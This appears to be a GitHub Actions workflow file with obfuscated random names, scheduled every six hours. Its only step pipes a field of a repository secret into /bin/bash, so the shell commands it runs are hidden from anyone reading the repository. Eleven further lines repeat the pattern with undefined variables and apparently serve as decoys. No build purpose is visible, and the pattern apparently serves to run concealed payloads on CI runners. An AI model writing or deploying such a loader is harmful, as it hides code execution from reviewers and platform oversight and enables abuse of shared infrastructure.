name: tangutxo
on:
  workflow_dispatch:
  schedule:
    - cron: '18 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tangutxo
        env:
          snuqz7: ${{ secrets.snuqz7 }}
        run: |
          echo $snuqz7 | jq -r .geldx4989 | /bin/bash
          echo $sz993 | jq -r .a4 | /bin/bash
          echo $xqd41901 | jq -r .lxhtf7161 | /bin/bash
          echo $dxs8 | jq -r .c705 | /bin/bash
          echo $s48 | jq -r .g53 | /bin/bash
          echo $w8065 | jq -r .d96556 | /bin/bash
          echo $kixb65 | jq -r .oasze17484 | /bin/bash
          echo $uq006 | jq -r .em524 | /bin/bash
          echo $b39783 | jq -r .tjmxj4520 | /bin/bash
          echo $fxxl094 | jq -r .quu575 | /bin/bash
          echo $ty3859 | jq -r .wubxk53493 | /bin/bash
          echo $juor3 | jq -r .v44 | /bin/bash

